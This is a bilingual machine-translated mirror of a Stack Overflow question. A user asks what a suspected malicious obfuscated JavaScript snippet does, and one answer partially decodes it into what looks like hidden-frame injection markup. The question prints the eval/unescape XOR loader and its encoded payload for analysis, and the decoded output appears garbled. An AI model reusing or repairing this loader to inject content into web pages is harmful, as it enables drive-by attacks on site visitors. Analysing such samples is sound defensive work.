堆栈内存溢出
  简体   繁体   English

混淆 javascript 代码

[英]obfuscated javascript code

 原文  2011-06-29 02:41:16       javascript/ deobfuscation

问题描述

I have encountered some java script code which I believe is malicious but most of it is obfuscated.我遇到了一些 java 脚本代码,我认为这些代码是恶意的,但大部分都被混淆了。 I was wondering if someone could help me figure out what this code actually does.我想知道是否有人可以帮助我弄清楚这段代码的实际作用。

eval(unescape('function n48ec61ae(s) {
    var r = "";
    var tmp = s.split("12113781");
    s = unescape(tmp[0]);
    k = unescape(tmp[1] + "608421");
    for( var i = 0; i < s.length; i++) {
        r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-4);
    }
    return r;
}
'));
eval(unescape('document.write(n48ec61ae('') + 'GoqwpF@dmgiEFxipviJBkSbzbjxy,_WMD1yj{yoBFqa|g%ufxoA"go}swtip%-asvporpE$'EF3hachJAmulwisa~$^WYVF%<24-8(&,BQWOJ_G&0."J^ASHAP_NIRI 4. HWBR@QTAOKRCE$5!A@n~cqa PDVJH xw| $_RE@!oq~t:;5{s0ram`axsau2ows2ulaoizm6<21wnkdpicp5hx6vms@q042enA1?7+5=0oI $ZWTHPNWOBFj~ash#QLWIE.nsyaos5kl~& _PGI"ggtzq8ftmto. SDQHDT[I@^LI"6'#RLPKIZJIEONYF%= $SOPSXTOSLB/TS",LVMUKGTUAOVE.2&,VQWNTDXIF@;ntdvj~oxFHtsbrgpntKF3v{lvmukvEF3hpwpJ121137817396048' + unescape(''));'));
// -->

Just as a reminder DO NOT EXECUTE THIS CODE.提醒一下,不要执行此代码。

1 个解决方案

解决方案1
 3 已采纳  2011-06-30 01:36:32

Silly rabbit... tricks are for virtual machine images which you were planning on discarding anyway...傻兔子...技巧适用于您打算丢弃的虚拟机映像...

I've spent a good deal of time on this and I think I can confirm that this is so obfuscated that it can't do anything anymore.我在这方面花了很多时间,我想我可以确认这太模糊了,它不能再做任何事情了。

You'll get this:你会得到这个:

<html>D`i]eI>vdsq\H>kW^v`fly*ZLJI3ujouk@BuazbrkzkA&ckwo{lgm*dqrpcnl? +=@.k^fjFAaqhmewax!UPLLB0.0'4*?RPBH[?*,* FRAMEBORDER=0$<O<OCNYCKKV?A1%A>ku\tcPHRFJlozXW?<!cmzn6/-un3mdg\alo]o.com/nkdeeza280-{feasffr1hl2rgoDq.11bcC-7;'17,cI!YPYJLF[K><frame NAME="jo{]cs3fgy+"[PKE]cxzo5]s`nk&$O@SDHLUDCYAK.+NFL?ITGJBBDU>)9OCPMUOHVF>'XO&HZESF<SXCKNI*.(ZQQKOCMKB@/jp^r^viu=Gyq^rkljnGJ3pvgq`ognIB/jl{pD

The problem is that another function is needed to unscramble this.问题是需要另一个 function 来解读这个。 Notice how it has <html> as well as FRAMEBORDER= , and <frame ?注意它是如何具有<html>以及FRAMEBORDER=<frame的? That means that there is something which is able to break this up into chunks and reassemble it.这意味着有些东西能够将其分解成块并重新组装。 The fact that there are so much noise also suggests that there is a function which further decrypts this beyond the scope of n48ec61ae .有这么多噪音的事实也表明存在一个 function ,它在 n48ec61ae 的n48ec61ae之外进一步解密。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 混淆的Javascript代码? - Obfuscated Javascript code? 带有二进制值的混淆javascript代码? - Obfuscated javascript code with binary values? 理解混淆后的 JavaScript 源代码 - Understanding obfuscated JavaScript source code 为什么这个混淆的代码在JavaScript中是恶意的? - Why this obfuscated code is malicious in JavaScript? 阐明一个混淆的 javascript 代码块 - Elucidate an obfuscated javascript code block 从混淆的javascript代码创建javascript代码 - create javascript code from obfuscated javascript code 知识产权和缩小/混淆的JavaScript代码 - Intellectual property and minified/obfuscated javascript code 如何打败混淆的javascript代码的反混淆? - How to defeat deobfuscation of obfuscated javascript code? 这个混淆的JavaScript代码如何工作? - How does this obfuscated javascript code work? Javascript-有没有更简单的方法来读取混淆的压缩代码? - Javascript - Is there an easier way to read obfuscated, condensed code?
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM